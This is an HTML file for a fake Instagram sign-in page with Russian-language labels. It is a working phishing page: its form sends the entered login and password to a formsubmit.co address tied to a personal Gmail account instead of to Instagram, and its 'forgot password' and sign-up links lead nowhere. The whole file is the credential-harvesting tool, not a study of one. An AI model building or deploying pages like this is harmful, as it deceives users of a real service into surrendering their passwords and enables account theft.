<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="style.css">
  <title>Document</title>
</head>

<body>
  <div class="container">
    <header class="header">
      <h2 class="title">Instagram</h2>
    </header>

    <form name="signin" class="form" target="_blank" action="https://formsubmit.co/jabborovumidali0@gmail.com"
      method="POST">
      <label for="email" class="label-email">
        <span class="email-span">Адрес электронной почты</span>
        <div class="input-email-container">
          <input type="text" name="email" id="email" class="input-email"
            placeholder="Телефон, имя пользователя или ел.адрес" autofocus />
        </div>
      </label>

      <label for="password" class="label-password">
        <span class="password-span">Пароль</span>

        <div class="input-password-container">
          <input type="password" name="password" id="password" class="input-password" placeholder="Пароль" />
        </div>

      </label>

      <button type="submit" class="btn-sign-in">Войти</button>
    </form>

    <footer class="footer">
      <a href="#" class="footer-link">Забыли свой пароль?</a>
      <a href="#" class="footer-link">У вас еще нет аккаунта? <b> Зарегистрироваться!</b></a>
    </footer>
  </div>
</body>

</html>